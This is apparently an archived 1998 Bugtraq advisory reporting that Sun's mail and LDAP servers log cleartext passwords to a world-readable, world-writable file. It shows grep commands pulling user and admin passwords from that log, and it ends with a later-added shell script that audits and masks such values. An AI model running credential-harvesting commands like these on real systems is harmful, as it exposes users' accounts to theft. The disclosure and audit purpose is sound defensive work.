Date: Fri, 25 Dec 1998 19:51:56 PST
From: Dana Jones 
Reply-To: Bugtraq List 
To: BUGTRAQ@netspace.org
Subject: Vulnerability

SIMS 3.x (Sun Internet Mail Server) and SDS 1.x & 3.1 (Sun LDAP
Directory services) vulnerability.

/var/opt/SUNWconn/ldap/log/slapd.log is used to log LDAP
connects/operations.

I won't waste a lot of typing on detailing the problem; perhaps this
simple example will suffice:

% cd /var/opt/SUNWconn/ldap/log/
% ls -l slapd.log

-rw-rw-rw-   1 root     root       33519 Dec 16 16:00 slapd.log

% grep password slapd.log

Wed Dec 16 12:55 : conn=41 op=2 SRCH base="CN=Joe T. User
(joet),OU=People,O=email,C=US" scope=2 filter="(userpassword=bettysue)"

% grep password slapd.log | grep admin

Wed Dec 16 12:55 : conn=41 op=2 SRCH base="CN=admin
(admin),OU=People,O=email,C=US" scope=2 filter="(userpassword=secret)"


Yes folks, world readable (and writable for that matter) and
clear text passwords and uids of all those folks logging into the IMAP
server to check mail, etc., and on a machine that users can log into.

Almost takes all the fun out of it.
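
Added example, not part of the original post: a small sh audit for the condition shown above. It flags a log that is readable or writable by "other" and counts or masks userpassword filter values without printing them. The function names and the sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added audit example (not from the original post). Sample data is constructed.

# Succeeds (exit 0) if "other" has read or write permission on the file.
world_accessible() {
    other=$(ls -ld -- "$1" | cut -c8-9)   # other r/w columns of e.g. -rw-rw-rw-
    [ "$other" != "--" ]
}

# Prints the number of lines whose search filter carries a userpassword value.
count_password_filters() {
    grep -c -i 'filter="[^"]*userpassword=' "$1" || true
}

# Copies the log to stdout with every userpassword value masked.
redact_password_filters() {
    sed -E 's/([Uu]ser[Pp]assword=)[^)"]*/\1[REDACTED]/g' "$1"
}

# Reports on one log file without ever printing a password value.
audit_log() {
    if world_accessible "$1"; then
        echo "FAIL: $1 is readable or writable by other; fix with: chmod o-rw $1"
    else
        echo "ok:   $1 is not accessible to other"
    fi
    echo "info: $(count_password_filters "$1") line(s) with a userpassword filter value"
}

# Constructed sample in the format shown in the post (values are made up).
make_sample_log() {
    cat > "$1" <<'EOF'
Wed Dec 16 12:55 : conn=41 op=1 SRCH base="OU=People,O=example,C=US" scope=2 filter="(uid=testu)"
Wed Dec 16 12:55 : conn=41 op=2 SRCH base="CN=Test User (testu),OU=People,O=example,C=US" scope=2 filter="(userpassword=CONSTRUCTED-VALUE)"
EOF
}

# Demo: audit the log named on the command line, else a constructed sample.
if [ "$#" -gt 0 ]; then
    audit_log "$1"
else
    tmp=$(mktemp) && make_sample_log "$tmp" && chmod 666 "$tmp"
    audit_log "$tmp"
    redact_password_filters "$tmp"
    rm -f "$tmp"
fi
```

Tightening the mode only limits who can read the file; values already logged stay in it until the log is rotated or scrubbed.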

    Source: geocities.com/dharan6/library/hack99
